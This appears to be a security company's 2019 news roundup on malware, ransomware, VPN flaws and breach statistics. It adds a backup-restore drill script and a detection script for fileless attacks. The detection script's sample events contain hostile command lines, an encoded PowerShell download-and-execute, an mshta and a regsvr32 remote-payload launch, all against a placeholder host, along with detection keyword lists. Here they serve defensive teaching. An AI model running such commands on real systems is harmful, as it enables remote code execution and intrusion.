The attacks are said to be amongst the worst computer hacking and bank fraud schemes of the past decade. The $5m reward being offered for information leading to their arrest and prosecution is the largest yet for catching cyber criminals.
Thursday's indictment came after a multi-year investigation by the US and British law enforcement agencies.
Authorities allege that the group stole at least $100m (£76m) using the Bugat malware, better known as Dridex.
The malware was spread through so-called "phishing" campaigns, which encouraged victims to click on malicious links sent by email from supposedly trusted entities.
Once a computer was infected, the group stole personal banking information which was used to transfer funds.
A network of money launderers, targeted by the NCA and Britain's Metropolitan Police, was then used to funnel the criminal proceeds to members of Evil Corp. Eight members of this network have been sentenced to a total of over 40 years in prison.
New ransomware attacks target your NAS devices, backup storage
New ransomware that targets Network Attached Storage devices and other backup devices has surged in recent months with many users unprepared for the increased level of threat.
As with all ransomware paying the ransom is no guarantee of getting data back and should only ever be an absolute last resort.
With networked and backup storage devices falling victim to ransomware, firms need to ensure they also hold offline copies of their backups. A backup that is disconnected from the network cannot be encrypted or deleted by ransomware running on that network, and is therefore a firm's best bet for recovering from such an attack.
https://www.zdnet.com/article/new-ransomware-attack-targets-your-nas-devices-backup-storage/
New vulnerability lets attackers sniff or hijack VPN connections
Academics have disclosed this week a security flaw impacting Linux, Android, macOS, and other Unix-based operating systems that allows an attacker to sniff, hijack, and tamper with VPN-tunneled connections. OpenVPN, WireGuard, and IKEv2/IPSec VPNs are all vulnerable to attacks.
The vulnerability, tracked as CVE-2019-14899, resides in the networking stacks of multiple Unix-based operating systems, and more specifically in how they reply to unexpected network packet probes.
According to the research team, an attacker on the same local network (a malicious Wi-Fi access point, for example) can use this behaviour to probe a device, learn the virtual IP address assigned by the VPN, infer which TCP connections are active inside the tunnel and, in some configurations, inject data into them. The mitigations the researchers suggested include enabling strict reverse path filtering and dropping packets addressed to the VPN's virtual IP that arrive on the physical interface.
Whilst this vulnerability affects Linux, Android, macOS and other Unix-based operating systems, it is not currently believed to affect Windows.
https://www.zdnet.com/article/new-vulnerability-lets-attackers-sniff-or-hijack-vpn-connections/
Newly discovered Mac malware uses “fileless” technique to remain stealthy
Hackers believed to be working for the North Korean government have upped their game with a recently discovered Mac trojan that uses in-memory execution to remain stealthy.
In-memory execution, also known as fileless infection, never writes anything to a computer hard drive. Instead, it loads malicious code directly into memory and executes it from there. The technique is an effective way to evade antivirus protection because there’s no file to be analyzed or flagged as suspicious.
In-memory infections were once the sole province of state-sponsored attackers. By 2017, more advanced financially motivated hackers had adopted the technique. It has become increasingly common since then.
Europol seizes more than 30,000 counterfeit sites on Cyber Monday
Europol has taken down more than 30,000 different web domains which allowed cyber criminals to sell counterfeit and pirated items online.
The joint operation between 18 member states and the US National Intellectual Property Rights Coordination Centre, with help from Eurojust and INTERPOL, included the seizure of articles such as fake medicines, pirated movies, music and software, and counterfeit electronics.
In addition, officials identified and froze more than €150 000 (£128,000) in several bank accounts and online payment platforms.
As a result of the coordinated operation, codenamed IOS X (In Our Sites), three arrests have been made and 26,000 "luxury products" have been seized along with the swathe of illicit websites.
The IOS campaign, launched in 2014, has grown in strength year on year and aims to "make the internet a safer place for consumers by recruiting more countries and private sector partners to participate in the operation and providing referrals".
Week in review 06 October 2019: top 10 cyber myths, security breaches inevitable, employee negligence contribute to data breaches, UK local authorities hit with hundreds of cyberattacks every hour
Top 10 Cyber Security Myths
SecurityBoulevard.com have a list of the top 10 cyber security myths that criminals love, including the Number 1 ‘This can’t happen to me’ and a few other prime examples that we do hear in conversation quite often.
Read the full list here: https://securityboulevard.com/2019/10/10-cybersecurity-myths-that-criminals-love/
A security breach is inevitable, IT leaders warned
No matter how much IT security tech and training is in place, sophisticated, targeted attacks are going to breach company defences, Carbon Black warns.
A survey by security vendor Carbon Black, as part of their Global threat series study, reported that 84% of UK organisations participating in the study said they have suffered one or more breaches in the past 12 months due to external cyber attacks.
The survey reported that the average number of breaches in affected organisations was 2.89, a reduction from the 3.67 seen in the January 2019 report, with more than half (51.5%) of respondents saying they had been breached only once.
Carbon Black said the number of businesses identifying just a single breach has grown from the previous research, where only 15% had suffered only a single breach. This may indicate that businesses are responding more robustly to breach incidents to ensure that frequency is reduced.
At the other end of the scale, 5.5% of the businesses surveyed admitted they had been breached 10 or more times, and 3% said they didn’t know how many times they had been breached.
The study found that among the IT leaders who took part in the research, 84% reported an increase in cyber attacks in the past 12 months, with nine in 10 saying the attacks they face are becoming more sophisticated. This compares with 87% in the previous report and 82% in the summer of 2018.
https://www.computerweekly.com/news/252471594/A-security-breach-is-inevitable-IT-leaders-warned
Employee negligence can be a leading contributor to data breaches
Two thirds (68%) of businesses reported that their organisation has experienced at least one data breach in the past 12 months, and more than two thirds (69%) of those breaches involved the loss or theft of paper documents or electronic devices containing sensitive information, according to a report conducted by the Ponemon Institute.
https://www.helpnetsecurity.com/2019/10/01/workplace-data-breaches-risk/
UK local authorities hit with hundreds of cyberattacks every hour
Councils across the UK have suffered 263 million attacks in the first six months of the year, equivalent to 800 attacks an hour, or 13 attacks every minute. This is according to a new report by Gallagher, based on a Freedom of Information (FoI) request sent to the councils. Only 203 of them answered; another 204 did not respond, so the actual number of attacks could be more than double the above, exceeding 500 million in the first half of the year. This gives an idea of the sheer scale of the attacks going on all the time against organisations of every kind.
https://www.itproportal.com/news/uk-local-authorities-hit-with-hundreds-of-cyberattacks-every-hour/
Microsoft: Any form of MFA takes users out of reach of most attacks
There have been several reports in the media regarding SIM hijacking attacks and the ease with which these types of attacks are being perpetrated, and these reports have raised some doubts or concerns about the security of multi-factor authentication.
This article does a good job of explaining that not all MFA solutions are created equal, but the overarching message is that any MFA implementation, anything beyond just a username and password, significantly increases the amount of work for an attacker: by Microsoft's figures, accounts protected by MFA are more than 99.9% less likely to be compromised.
FBI Stance on Whether Firms Should Pay Ransomware
The FBI in the US came out with hard hitting advice telling firms not to pay ransoms, but to inform the FBI in the event that a firm in the US did decide to pay a ransom.
They then softened their stance with an updated version of their guidance including a section discussing the option of paying the hackers to get data decrypted.
https://www.theregister.co.uk/2019/10/03/fbi_softens_stance_on_ransomware/
Best practice around ransomware is always to ensure you have sufficient backups, both online and offline, so that you can restore your data in the event you are hit. Firms also need to have tested recovering their data, to make sure they could actually recover if they needed to. It is too late, when trying to recover for real, to discover that the backup doesn't work or that the wrong directory was being backed up.
Do not rely on cloud storage as a sufficient backup: a sync client will often upload the ransomware-encrypted versions of files, overwriting the good copies in the cloud, before the infection is detected.
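The advice above reduces to one repeatable drill: back up, restore somewhere scratch, and compare what came back against what went in. The following is an added example of that drill (not from the FBI guidance or the article), with constructed sample data. The manifest of digests taken at backup time is the reference point; keep it with the offline copy, because if ransomware has reached the backup target, the restored files will be the ones that no longer match.

```python
import hashlib
import tarfile
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def hash_tree(root: Path) -> Dict[str, str]:
    """Map each file under root (relative POSIX path) to its SHA-256 digest."""
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def make_backup(source: Path, archive: Path) -> Dict[str, str]:
    """Write a tar.gz of source and return the manifest of digests taken at backup
    time. It is what every later restore is judged against."""
    with tarfile.open(str(archive), "w:gz") as tar:
        tar.add(str(source), arcname=".")
    return hash_tree(source)


def restore(archive: Path, dest: Path) -> None:
    """Extract into dest, refusing any member that would land outside it
    (a crafted archive could otherwise overwrite files elsewhere)."""
    base = dest.resolve()
    with tarfile.open(str(archive), "r:gz") as tar:
        for member in tar.getmembers():
            target = (base / member.name).resolve()
            if target != base and base not in target.parents:
                raise ValueError(f"unsafe path in archive: {member.name}")
        if hasattr(tarfile, "data_filter"):   # Python 3.12+: also rejects links/devices
            tar.extractall(base, filter="data")
        else:
            tar.extractall(base)


def verify_restore(manifest: Dict[str, str], restored: Path) -> List[str]:
    """Files missing from or differing in the restored tree; empty list = drill passed."""
    actual = hash_tree(restored)
    problems: List[str] = []
    for rel, digest in manifest.items():
        if rel not in actual:
            problems.append(f"missing: {rel}")
        elif actual[rel] != digest:
            problems.append(f"modified: {rel}")
    return problems


def restore_drill(source: Path, workdir: Path) -> Tuple[Dict[str, str], Path, List[str]]:
    """Back up, restore into a scratch directory and compare.
    Returns (manifest, restored_path, problems)."""
    archive = workdir / "backup.tar.gz"
    manifest = make_backup(source, archive)
    restored = workdir / "restored"
    restored.mkdir()
    restore(archive, restored)
    return manifest, restored, verify_restore(manifest, restored)


def run_demo() -> Tuple[List[str], List[str]]:
    """Constructed data: a clean drill, then the same restored tree after a
    simulated ransomware pass (one file encrypted in place, one deleted)."""
    tmp = Path(tempfile.mkdtemp())
    source = tmp / "data"
    (source / "finance").mkdir(parents=True)
    (source / "finance" / "ledger.csv").write_text("account,amount\n1001,250.00\n")
    (source / "notes.txt").write_text("quarterly review\n")
    manifest, restored, clean = restore_drill(source, tmp)
    (restored / "notes.txt").write_bytes(b"\x00\x13encrypted-by-ransomware")
    (restored / "finance" / "ledger.csv").unlink()
    tampered = verify_restore(manifest, restored)
    return clean, sorted(tampered)


if __name__ == "__main__":
    clean, tampered = run_demo()
    print("clean drill:", clean or "OK")
    print("after simulated ransomware:", tampered)
```

Run the drill on a schedule against the offline copy, not just the online one, and treat any non-empty result as an incident: "modified" on a restored file means the backup itself was reached, which is exactly the NAS scenario described earlier.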
More Attacks Seen Using 'Island Hopping' (using less well-defended partners as a stepping stone to better-defended targets)
Recent attacks, especially against the aerospace and defence industries, have seen an increase in 'island hopping', where a larger or better-defended target is attacked indirectly through its network of weaker, less well-defended partner companies. These attacks move 'horizontally' across the supply chain rather than 'vertically' at the primary target.
https://www.zdnet.com/article/this-new-hacking-group-is-using-island-hopping-to-target-victims/
In addition to the recent aerospace attacks island hopping is also becoming more frequently used to attack financial services.
https://www.itpro.co.uk/security/33946/50-of-cyber-attacks-now-use-island-hopping
Half a million British Airways customers have been given the go-ahead to sue the airline over its cyber security breach in 2018
On Friday a High Court judge granted a group litigation order, paving the way for a mass legal action by some 500,000 people affected by a series of breaches between April and September 2018.
Cost of cyber security breaches to increase nearly 70% in next 5 years
New analysis from Juniper Research has found that the cost of data breaches will rise from $3 trillion each year to over $5 trillion in 2024, an average annual growth of 11%.
This will primarily be driven by increasing fines for data breaches as regulation tightens, as well as a greater proportion of business lost as enterprises become more dependent on the digital realm.
The new research in The Future of Cybercrime & Security: Threat Analysis, Impact Assessment & Mitigation Strategies 2019-2024 whitepaper noted that while the cost per breach will steadily rise in the future, the levels of data disclosed will make headlines but not impact breach costs directly, as most fines and lost business are not directly related to breach sizes.
Sophisticated tools provide false sense of cyber-security: Survey
Are you confident that your firm is cyber-threat-proof? A Forrester survey among over 250 senior security decision-makers in North America and Europe found that most of them are confident in their firms’ security measures. However, threats to cyber-security remain strong, said the research.
"The abundance of technology investments gives firms a false sense of confidence in their security posture. Their challenges reveal a different story," said the report.
Security executives currently employ a variety of tools and technologies to identify risks and test the effectiveness of their security controls. As a result, they are left with point-in-time assessments that require them to cobble together data from disparate systems to truly understand the organisation’s security posture. This approach is reactive, labour-intensive, and insufficient in scale, explained the report.
Fileless Malware on the Rise
According to reports analysing the state of the threat landscape, fileless malware incidents were up 265% in the first half of 2019 compared with the same period in 2018. Fileless malware has sometimes been referred to as a zero-footprint attack or a non-malware attack. However, fileless malware may be the best name for the method, because the attack does not depend on end users downloading and running malware delivered as a file. Instead, it executes malicious scripts by piggybacking on legitimate software already on the machine, and more often than not the malicious code resides only in the computer's memory (RAM) rather than being installed on the hard drive.
https://securityboulevard.com/2019/10/fileless-malware-on-the-rise/
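As an added example (not code from this article or the earlier item on the fileless Mac trojan), here is the kind of detection logic a SOC runs over process-creation telemetry to catch the two hallmarks both pieces describe: a legitimate host binary being used to pull code straight into memory, and an encoded command line hiding what that code is. The events, the encoded downloader and the field names are constructed for the example; the rule set is illustrative rather than any vendor's.

```python
import base64
import re
from typing import Dict, List

# Image names that fileless tradecraft commonly rides on (living-off-the-land binaries).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE", "OUTLOOK.EXE"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{20,})")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
REMOTE_CODE = re.compile(r"(?i)https?://|javascript:|scrobj\.dll")
IN_MEMORY_MARKERS = ("iex", "invoke-expression", "downloadstring", "frombase64string",
                     "reflection.assembly", "invoke-webrequest")

# Constructed sample: the downloader a macro might launch, encoded the way
# PowerShell expects (base64 of UTF-16LE) so that the script never touches disk.
DOWNLOADER_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED_DOWNLOADER = base64.b64encode(DOWNLOADER_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation events in a Sysmon-like shape (field names are
# illustrative, not any vendor's schema).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"pid": 4012, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {ENCODED_DOWNLOADER}"},
    {"pid": 4050, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"pid": 4100, "parent": "cmd.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/payload.hta"},
    {"pid": 4200, "parent": "svchost.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    {"pid": 4300, "parent": "services.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload, or '' if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyse(event: Dict[str, object]) -> List[str]:
    """Names of the rules that fire for one process-creation event."""
    image = str(event["image"]).lower()
    parent = str(event["parent"]).upper()
    cmdline = str(event["cmdline"])
    hits: List[str] = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawn_script_host")
    if HIDDEN_WINDOW.search(cmdline):
        hits.append("hidden_window")
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits.append("encoded_powershell")
        if any(marker in decoded.lower() for marker in IN_MEMORY_MARKERS):
            hits.append("in_memory_downloader")
    if image in SCRIPT_HOSTS and REMOTE_CODE.search(cmdline):
        hits.append("remote_lolbin")
    return hits


def scan(events: List[Dict[str, object]]) -> Dict[int, List[str]]:
    """pid -> rules fired, for the events with at least one finding."""
    findings: Dict[int, List[str]] = {}
    for event in events:
        hits = analyse(event)
        if hits:
            findings[int(event["pid"])] = hits
    return findings


if __name__ == "__main__":
    for pid, rules in scan(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The point of decoding rather than just flagging the -Enc switch is precision: administrators do run encoded PowerShell, but a decoded payload that downloads and IEX-evaluates a string is the in-memory execution the articles describe, and it is invisible to anything that only inspects files on disk. The benign backup script and the ordinary rundll32 call in the sample produce no findings, which is the bar a rule has to clear before it goes into production.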